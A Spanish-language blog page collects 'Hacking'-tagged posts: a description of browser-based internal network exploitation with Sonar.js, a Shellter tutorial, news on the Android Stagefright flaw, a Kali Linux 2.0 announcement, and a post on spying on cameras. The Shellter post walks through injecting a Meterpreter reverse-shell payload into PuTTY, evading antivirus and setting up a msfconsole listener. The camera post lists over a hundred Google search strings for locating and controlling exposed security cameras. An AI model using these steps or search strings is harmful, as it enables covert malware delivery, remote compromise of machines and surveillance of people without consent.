Mostrando entradas con la etiqueta Hacking. Mostrar todas las entradas
Mostrando entradas con la etiqueta Hacking. Mostrar todas las entradas

Hacking y explotación de una red interna


Según una encuesta por empresa de seguridad informática, la mayoría de las personas creen que mientras se navegan por la Web que están protegidas por firewalls y redes aisladas a través de direcciones privadas del IP NAT. Con este entendimiento, asumimos la seguridad de los sitios web de intranet y las interfaces basadas en routers, cortafuegos, impresoras, teléfonos IP, sistemas de nómina, etc., aunque dejamos sin parchear. Pensamos que permanecen seguro dentro de la zona protegida y nada es capaz de conectar directamente desde el mundo exterior, ¿no?
Bueno, no del todo. Navegadores web pueden ser completamente controlados por cualquier página web, lo que les permite atacar los recursos de la red interna acuerdo con profesores de formación de hacking ético. La navegador web de cada usuario en una red empresarial se puede cambiar en un trampolín para los intrusos sin soluciones de seguridad perimetral avanzados.

 Explotar la red interna
Expertos en seguridad explican procedimientos para explorar una red interna, a saber:
  • Una víctima visita una página web maliciosa, que asume el control de su navegador Web. La página web maliciosa podría ser cualquiera página web, atada con un ataque XSS permanente que hackers están aprovechando para la entrega de malware masivo.
  • Cuando se ejecuta el malware, lo hace desde la perspectiva de la intranet de la víctima, donde nadie puede acceder directamente. Esto quiere decir que el navegador web de la víctima puede ser instruido para entregar su dirección de NAT IP y hacer conexiones en la red interna en nombre del atacante o víctima.
  • El malware utiliza navegador web de la víctima como una plataforma de lanzamiento, donde el malware hace los análisis de puertos, fingerprinting de los servidores web en la red interna y revisa las soluciones de seguridad perimetral implementadas.
  • El malware se inicia los ataques contra los objetivos internos y la información comprometida se envía fuera de la red para la colección.
Es fácil a obtener la dirección IP pública de un navegador web desde el servidor web, pero la dirección IP interna es un más poco difícil. Esta es la pieza de información que necesitamos para comenzar a explorar y explotar intranet. Para obtener IP interna, tenemos que invocar Java en un navegador y un applet. Eso es una forma sencilla de hacerlo. El siguiente código carga el MyAddress.class y luego abre la URL de:
Si el navegador web de la víctima es una Mozilla / Firefox, es posible omitir el requisito subprograma e invocar una socket de Java directamente desde el JavaScript.

Framework para explotar la red interna: Sonar
Sonar.js es un marco que utiliza JavaScript, WebRTC, y algunas funciones onload para detectar dispositivos internos en una red. sonar.js funciona mediante la utilización WebRTC para enumerar hosts en vivo en la red interna. Así,   tras enumerar las direcciones internas sonar.js intenta vincular a los recursos estáticos como CSS, imágenes y JavaScript, mientras que conecta el controlador de eventos onload. Si carga los recursos con éxito e inicia el evento onload entonces sabemos que el anfitrión tiene este recurso.
¿Por qué es útil saber? Al obtener una lista de los recursos alojados en un dispositivo, podemos intentar hacer fingerprinting de los dispositivos y soluciones de seguridad perimetral.

¿Cómo funciona Sonar?
Al cargar payload de sonar.js en un navegador web moderno sucederá lo siguiente:
  • sonar.js utilizará WebRTC para enumerar lo IPs internas que tiene el usuario
  • sonar.js luego intenta encontrar otros hosts en vivo de la red interna a través de webSockets.
  • Si no se encuentra una gran cantidad en vivo, sonar.js comienza a intentar hacer fingerprinting mediante la vinculación a ella a través de:

...y enganchar el proceso de onload. Si el recurso carga con éxito se activará un evento para lanzar el exploit acuerdo con resultados de fingerprinting.
Sonar.js trabaja sobre una base de datos de fingerprints. Fingerprint es simplemente una lista de los recursos conocidos en una red que se pueden vincular a y detectados a través onload. Ejemplos de esto incluyen imágenes, hojas de CSS style, e incluso JavaScript externo.


Mediante la creación de sus propias fingerprints se puede construir exploits personalizados que serán lanzadas contra los dispositivos internos una vez que son detectados por sonar.js. Exploits comunes incluyen cosas como la Cross-site Request Forgery (CSRF), Cross-site Scripting (XSS), etc. La idea es que usted pueda utilizar estas vulnerabilidades para hacer cosas tales como modificar configuraciones DNS del router, el sacar archivos desde un servidor de archivos interno, y más.
También, mediante el uso de sonar.js pentesting puede construir exploits contra los servidores internos de registro, routers, impresoras, teléfonos VOIP, entre otros. Debido a las redes internas a menudo están menos vigiladas, ataques como CSRF y XSS pueden ser de gran alcance para hacerse cargo de las configuraciones de los dispositivos internos de una red.
Fuente: noticiasseguridad.com


Shellter: herramienta de inyección para evadir el antivirus



Shellter es una herramienta dinámica de inyección de shellcode . Puede ser utilizado para inyectar código shell en las aplicaciones nativas de Windows (Sólo 32 bits por el momento).

Puedes inyectar tu propio código o uno generado con un Framework, como Metasploit por ejemplo.
Shellter aprovecha la estructura original del archivo PE y no aplica ninguna modificación.

Para más información visita : shellter/project

Instalación
Lo primero que haremos es descargarlo desde su página oficial shellter/download. Es compatible con Windows , Linux y Mac (Usando wine) .

-Instalación en Kali Linux (si aún no tienes instalado Wine)

  1. apt-get update
  2. apt-get install shellter

-Instalación en BackBox

Primero hay que agregar los repositorios :
  1. nano /etc/apt/sources.list

Añadimos las siguientes entradas :
  1. deb http://ppa.launchpad.net/backbox/four/ubuntu trusty main
  2. deb-src http://ppa.launchpad.net/backbox/four/ubuntu trusty main


  1. apt-get update
  2. apt-get install shellter

-Instalación en Arch Linux:


  1. yaourt -Syy
  2. yaourt -S aur/shellter

Una vez instalado , la siguiente fase sería la ejecución .
Para ejecutarlo tecleamos "shellter" en la terminal , o "wine shellter.exe" para los que ya tienen instalado Wine .
Una vez ejecutado , elegimos la opción "Automatique"  (A).



Después indicamos la ruta del archivo al que queremos inyectar el shellcode . Yo utilisaré Putty.


Ahora tenemos que indicar si queremos configurar un payload o elegir uno de la lista que nos propone Shellter. Podemos elegir la opción "L" (Listed) si queremos utilizar uno que ya aparece en la lista , "C" (Configure) para configurar o manualmente .


Vamos a teclear (L)

Después seleccionamos el payload que vamos a utilizar . Yo elegiré el primero (Meterpreter_Reverse_TCP) .

A continuación indicamos nuestra dirección IP y el puerto de escucha.

Y ya habremos terminado con Shellter .
Bueno ahora vamos a escanear nuestro archivo , en NoDistribute por ejemplo (Recomendado) .
Resultado

OK , sólo nos queda configurar el "listener".
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost x.x.x.x
set lport xxx
exploit


En mi máquina de prueba , dotada de 1 un antivirus , voy a ejecutar mi archivo (putty) . Y como me lo esperaba , no salta ninguna alerta y se ejecuta sin problema .



Fuente, información y video demo  en Underc0de



Vulnerabilidad en Android permite hackearlo con un MMS


Durante las últimas horas no han cesado de aparecer noticias hablando de la investigación de Joshua Drake, de la empresa Zimperium Mobile Security, quepodría suponer un grave riesgo de seguridad para la mayoría de smartphones con Android.

Este investigador ha descubierto varias vulnerabilidades en el reproductor de medios nativo de Android (Stagefright) que podrían provocar que un atacante escribiese código en el sistema o robase información del dispositivo.

Funcionamiento del ataque

El origen de este agujero de seguridad se oculta entre las miles de líneas de código que componen Android. Stagefright es una librería de medios que se encarga de gestionar varios formatos para que el usuario pueda ver vídeos o escuchar música en su smartphone.

Debido a que la gestión de estos medios tiene que ser rápida y consumir el mínimo de recursos posible, esta librería está desarrollada en el lenguaje C++, más propenso a las corrupciones de memorias que otros lenguajes más modernos como Java.

Para realizar este ataque, el investigador asegura que tan solo se necesita el número de teléfono de la víctima. Con este dato se puede enviar un mensaje MMS (con contenido multimedia) especialmente modificado e incluso, en algunos casos, se podría eliminar el mensaje antes de que el usuario lo viera, quedando solo la notificación de que ha sido recibido.

Si este ataque funciona tal y como lo ha descrito el investigador, estaríamos ante uno de los más peligrosos a los que se han enfrentado los usuarios de Android, puesto que no se requiere que la víctima haga nada como por ejemplo abrir un archivo adjunto a un mensaje, instalar una aplicación o pulsar sobre un enlace. Todo esto se realizaría de forma transparente para el usuario siempre que el teléfono tuviese cobertura.

El hecho de que la víctima no se dé cuenta de que está siendo el objetivo de un ataque supone que muchos podrían tener su smartphone comprometido y no darse cuenta de ello, algo que le permitiría al atacante obtener información muy importante del usuario objetivo.

En las siguientes capturas de pantalla vemos cómo funcionaría supuestamente este ataque en un Nexus 5 con Android Lollipop 5.1.1 instalado:



Versiones de Android afectadas

Según esta investigación, todas las versiones de Android a partir de Froyo (2.2) inclusive serían vulnerables, algo que supone, según algunos estudios, el 95 % de dispositivos o alrededor de 950 millones de usuarios en todo el mundo. Además, las versiones anteriores a Jelly Bean son las que tienen un riesgo mayor, puesto que no incorporan mitigaciones de exploits adecuadas.


Hay que tener en cuenta que Stagefright se compone en realidad de siete vulnerabilidades diferentes, que ya han sido reportadas y se les ha asignado su correspondiente CVE. Además, la empresa que ha publicado esta investigación avisó de la seriedad del problema a Google, lo que hizo que se prepararan y aplicaran parches en el código vulnerable en poco tiempo.

El problema reside en quién va a recibir estos parches. Los usuarios de dispositivos de Google como el smartphone Nexus 6, pueden estar seguros de que verán publicada esta actualización. Otros fabricantes puede que la lancen a sus dispositivos estrella más actuales, pero seguirá quedando una gran mayoría de usuarios sin actualizar debido a que ni los fabricantes ni las operadoras se van a molestar en lanzar esta actualización para aquellos dispositivos considerados obsoletos.

Mitigación del ataque

Parece ser que tan solo una actualización por parte del fabricante podría solucionar este grave problema, algo que ya hemos dicho es bastante improbable que se produzca para cientos de millones de usuarios de Android en sus smartphones.

Así pues, ¿qué solución nos queda? De momento, esperar. No olvidemos que este anuncio se ha producido la semana antes de que empiecen las conferencias de seguridad BlackHat y Defcon en Las Vegas, por lo que es lógico que se trate de ganar notoriedad para que asista el mayor número posible de gente a las charlas que el investigador dará en esa conferencia.

No obstante y de momento, la única información de la que disponemos es la proporcionada por la empresa en la que trabaja este investigador, por lo que deberíamos esperar a ver esta presentación antes de sacar nuestras propias conclusiones. No sería la primera vez que se presentase una vulnerabilidad como extremadamente crítica y luego se viese cómo su alcance se ve limitado a unos escenarios muy concretos.

Por eso recomendamos a los usuarios de Android que no se deshagan todavía de sus dispositivos y esperen a ver en qué consiste realmente este fallo de seguridad y cuáles son las posibilidades reales de sufrir un ataque de estas características.

Fuente: welivesecurity.com

Kali Linux 2.0 la popular distro para auditorías de seguridad: Nueva Versión


Kali Linux es sin lugar a dudas una de las distribuciones basadas en Linux orientada a auditorías de seguridad más conocida y utilizada. En el año 2013, los creadores de BackTrack, lanzaron la popular distribución con un nuevo nombre, Kali Linux, y ahora hemos conocido la fecha de salida de la versión Kali Linux 2.0 que incorpora un gran número de mejoras.

Hacía mucho tiempo que no teníamos ninguna noticia de nuevas versiones de Kali Linux, sin embargo tienen un gran motivo: han estado trabajando duramente en la segunda versión de la distribución donde habrá un gran número de cambios y mejoras. Si todo va como hasta ahora, Kali Linux 2.0 verá la luz el día 11 de Agosto de 2015, es decir, queda poco más de un mes para disfrutar de la nueva navaja suiza para pentesters e investigadores de seguridad.

Principales cambios y mejoras en Kali Linux 2.0

El principal cambio que ha sufrido Kali Linux 2.0 es su interfaz gráfica, ha sido rediseñada totalmente para optimizar al máximo el trabajo de los usuarios que empleen esta distribución. Asimismo también se han rediseñado todos los menús y las categorías de herramientas de seguridad incorporadas, facilitando al máximo su búsqueda. Asimismo desde Kali Linux se han preocupado mucho de las actualizaciones de software, y ahora tendremos actualizaciones de las principales herramientas de manera semanal, su instalación será tan fácil y rápida como hasta ahora.

Una de las principales herramientas de seguridad que incorporará Kali Linux es el framework Metasploit, han prestado especial atención a esta herramienta de pentesting tan utilizada y han incorporado Ruby 2.0 de manera nativa para acelerar al máximo los tiempos de carga.

Respecto a la interfaz gráfica, tendremos notificaciones en el propio escritorio para no perder detalle de todos los trabajos. Asimismo también se han incorporado herramientas para grabar vídeos de la propia interfaz gráfica con el objetivo de facilitar la elaboración de videotutoriales.

Una de las herramientas más utilizadas en Kali Linux son las relacionadas con las auditorías inalámbricas, en esta versión tendremos disponibles las últimas herramientas como por ejemplo Reaver o PixieWPS, así como una gran cantidad de diccionarios ya incorporados en la distribución.

Os recomendamos ver el vídeo promocional de esta nueva versión Kali Linux 2.0:





Podéis acceder a la página web oficial de Kali Linux donde veréis el anuncio oficial de la salida de esta nueva distro. Os recomendamos acceder a nuestra sección de seguridad informática donde tenéis disponibles una gran cantidad de manuales.



Fuente: redeszone.net

Espiar camaras de seguridad de todo el mundo


Con solo poner lo siguiente en google:

  1. inurl:\view\index.shtml

podran ver camaras ubicadas en las calles de todas las partes del mundo, y no solo eso, sino que tambien podran manejarlas


http://i.ytimg.com/vi/82yI156H3uQ/hqdefault.jpg

Aqui les dejo otra que me paso mi amiga Traxtor:

  1. inurl:\ViewerFrame?Mode=

Aca mas:

  1. inurl:ViewerFrame?Mode=
  2. inurl:MUltiCameraFrame:?Mode=
  3. inurl:view/index.shtml
  4. inurl:indexFrame.shtml Axis
  5. inurl:"ViewerFrame?Mode="
  6. intitle:snc-rz30 inurl:home/
  7. inurl:/view/index.shtml
  8. inurl:"ViewerFrame?Mode="
  9. inurl:netw_tcp.shtml
  10. intitle:"supervisioncam protocol"
  11. inurl:CgiStart?page=Single
  12. inurl:indexFrame.shtml?newstyle=Quad
  13. intitle:liveapplet inurl:LvAppl
  14. inurl:/showcam.php?camid
  15. inurl:video.cgi?resolution=
  16. inurl:image?cachebust=
  17. intitle:"Live View / - AXIS"
  18. inurl:view/view.shtml
  19. intext:"MOBOTIX M1"
  20. intext:"Open Menu"
  21. intitle:snc-rz30
  22. inurl:home/
  23. inurl:"MultiCameraFrame?Mode="
  24. intitle:"EvoCam" inurl:"webcam.html"
  25. intitle:"Live NetSnap Cam-Server feed"
  26. intitle:"Live View / - AXIS 206M"
  27. intitle:"Live View / - AXIS 206W"
  28. intitle:"Live View / - AXIS 210"
  29. inurl:indexFrame.shtml Axis
  30. inurl:"ViewerFrame?Mode="
  31. inurl:"MultiCameraFrame?Mode=Motion"
  32. intitle:start inurl:cgistart
  33. intitle:"WJ-NT104 Main Page"
  34. intext:"MOBOTIX M1" intext:"Open Menu"
  35. intext:"MOBOTIX M10" intext:"Open Menu"
  36. intext:"MOBOTIX D10" intext:"Open Menu"
  37. intitle:snc-z20 inurl:home/
  38. intitle:snc-cs3 inurl:home/
  39. intitle:snc-rz30 inurl:home/
  40. intitle:"sony network camera snc-p1"
  41. intitle:"sony network camera snc-m1"
  42. site:.viewnetcam.com -www.viewnetcam.com
  43. intitle:"Toshiba Network Camera" user login
  44. intitle:"netcam live image"
  45. intitle:"i-Catcher Console - Web Monitor"
  46. inurl:/home/home
  47. "Kamerainformationen anzeigen"
  48. intitle:"AXIS 2100 Network Camera Axis 2100 Network Camera 2.02"
  49. intitle:"Linksys Web Camera" "ver"

Y MAS!

  1. (intitle:(EyeSpyFX|OptiCamFX) “go to camera”)|(inurl:servlet/DetectBrowser)
  2. inurl:”ViewerFrame?Mode=”
  3. intitle:”Live View / - AXIS” | inurl:view/view.shtml
  4. inurl:”MultiCameraFrame?Mode=”
  5. intitle:”WJ-NT104 Main”
  6. intitle:”snc-rz30 home” Requiere plugin Active-X.
  7. inurl:”ViewerFrame?Mode=Motion” Requiere plugin Active-X.
  8. inurl:LvAppl intitle:liveapplet
  9. intitle:”Live View / - AXIS” Requiere plugin Active-X.
  10. intitle:”Powered by webcamXP”
  11. inurl:indexFrame.shtml “Axis Video Server”
  12. inurl:”MOBOTIX M1? and “open menu”
  13. intitle:flexwatch intext:”Copyright by Seyeon TECH Co”
  14. “axis video server view.shtml”
  15. “/view/view.shtml axis”
  16. “adding live video to one of your own pages a very easy task with an AXIS 2100 Network Camera”
  17. “Live view - / - AXIS”
  18. “Your browser has JavaScript turned off.For the user interface to work effectively”
  19. “indexFrame.html axis”
  20. “Live web imaging unleashed”
  21. “sample/LvAppl/”
  22. “/control/userimage.html”
  23. “(c)copyright 1999-2003 VICTOR COMPANY OF JAPAN, LIMITED. All rights reserved”
  24. “V.Networks Motion Picture(Java)”
  25. “Control the Pan/Tilt and move to the Preset Position”
  26. “/app/idxas.html”
  27. “Saving & Retrieving Mode”
  28. “/ViewerFrame?Mode=Motion”
  29. “TOSHIBA Network Camera - User Login”
  30. “/home/homeJ.html”
  31. “my webcamXP server!”
  32. inurl:/view.shtml
  33. intitle:”Live View / - AXIS” | inurl:view/view.shtml^
  34. inurl:ViewerFrame?Mode=
  35. inurl:ViewerFrame?Mode=Refresh
  36. inurl:axis-cgi/jpg
  37. inurl:axis-cgi/mjpg (motion-JPEG)
  38. inurl:view/indexFrame.shtml
  39. inurl:view/index.shtml
  40. inurl:view/view.shtml
  41. liveapplet
  42. intitle:”live view” intitle:axis
  43. intitle:liveapplet
  44. allintitle:”Network Camera NetworkCamera”
  45. intitle:axis intitle:”video server”
  46. intitle:liveapplet inurl:LvAppl
  47. intitle:”EvoCam” inurl:”webcam.html”
  48. intitle:”Live NetSnap Cam-Server feed”
  49. intitle:”Live View / - AXIS”
  50. intitle:”Live View / - AXIS 206M”
  51. intitle:”Live View / - AXIS 206W”
  52. intitle:”Live View / - AXIS 210?
  53. inurl:indexFrame.shtml Axis
  54. inurl:”MultiCameraFrame?Mode=Motion”
  55. intitle:start inurl:cgistart
  56. intitle:”WJ-NT104 Main Page”
  57. intext:”MOBOTIX M1? intext:”Open Menu”
  58. intext:”MOBOTIX M10? intext:”Open Menu”
  59. intext:”MOBOTIX D10? intext:”Open Menu”
  60. intitle:snc-z20 inurl:home/
  61. intitle:snc-cs3 inurl:home/
  62. intitle:snc-rz30 inurl:home/
  63. intitle:”sony network camera snc-p1?
  64. intitle:”sony network camera snc-m1?
  65. site:.viewnetcam.com -www.viewnetcam.com
  66. intitle:”Toshiba Network Camera” user login
  67. intitle:”netcam live image”
  68. intitle:”i-Catcher Console - Web Monitor”

Esperamos que les sirva!